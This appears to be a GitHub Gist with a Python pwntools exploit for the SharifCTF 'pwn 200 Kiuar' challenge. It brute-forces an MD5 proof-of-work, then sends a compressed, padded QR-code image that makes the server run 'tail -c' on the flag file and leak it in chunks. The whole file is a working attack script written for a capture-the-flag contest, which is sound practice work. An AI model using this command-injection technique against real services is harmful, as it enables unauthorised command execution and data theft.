Last active
February 7, 2016 19:58
-
-
Save djekmani/c749b35c20320f1bd37e to your computer and use it in GitHub Desktop.
SharifCTF pwn 200 Kiuar
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
from hashlib import * | |
import zlib | |
import qrcode | |
# context.log_level = 'debug' | |
#task: telnet ctf.sharif.edu 12432 | |
HOST = "ctf.sharif.edu" | |
PORT = 12432 | |
def create_qrcode(cmd): | |
qr = qrcode.QRCode(version = 1 , | |
error_correction=qrcode.constants.ERROR_CORRECT_L, | |
box_size = 1, | |
border = 1 | |
) | |
qr.add_data(cmd) | |
qr.make(fit=True) | |
img = qr.make_image() | |
f = open("Qr-cmd.png" , 'w+') | |
img.save(f , 'png') | |
f.close() | |
img = open('Qr-cmd.png' , 'r') | |
data = img.read() | |
img.close() | |
data = zlib.compress(data , zlib.Z_BEST_COMPRESSION) | |
data = pad_img(data) | |
return data | |
def get_binary(line): | |
start = 67 | |
return line[start:start+22] | |
def get_integer(bin_prefix): | |
for i in xrange(1000000000,10000000000000000): | |
if(bin(int(md5(hex(i)[2:]).hexdigest(),16))[2:24] == bin_prefix): | |
return [hex(i)[2:] , md5(hex(i)[2:]).hexdigest()] | |
return False | |
def pad_img(img): | |
img += "\x90"*(200-len(img)) | |
return img | |
def get_chunk(): | |
chunk = [19, 36] | |
flag = '' | |
for i in chunk: | |
cnx = remote(HOST , PORT) | |
cmd = "tail -c " +str(i)+ " flag" | |
data = create_qrcode(cmd) | |
print "[+] Qr-code compressed Zlib image created" | |
line = cnx.recvline_startswith('Give' , True) | |
cnx.recv() | |
prefix = get_binary(line) | |
print "[+] prefix: "+ prefix | |
print "[+] Bruteforcing md5 hash" | |
[integer , md5] = get_integer(prefix) | |
print "[+] integer is: "+ integer | |
print "[+] md5 hash is: "+ md5 | |
print "[+] Sending the integer" | |
cnx.send(integer) | |
resp = cnx.recvuntil('T') | |
print "[+] Sending compressed image" | |
cnx.send(data) | |
resp = cnx.recv() | |
print "[+] Chunk leaked: "+resp[103:] + "\n" | |
flag = resp[103:] + flag | |
return 'SharifCT' + flag | |
#THE MAIN | |
flag = get_chunk() | |
print "[+] The final flag is: "+ flag |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment